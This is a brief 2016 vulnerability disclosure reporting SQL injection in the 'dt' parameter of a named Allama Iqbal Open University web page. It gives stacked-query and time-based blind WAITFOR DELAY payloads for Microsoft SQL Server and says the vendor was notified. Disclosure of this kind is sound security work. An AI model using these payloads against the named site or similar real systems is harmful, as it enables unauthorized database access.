July 26, 2016
Allama Iqbal Open University
Website: http://www.aiou.edu.pk/All_Dept_List.asp?dt=1 (GET)
Vulnerability type: SQL injection
Submitted by: Waqas Haider
PoC:
Parameter: dt (GET)
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: dt=1;WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: dt=1 WAITFOR DELAY '0:0:5'
Notification: Vendor notified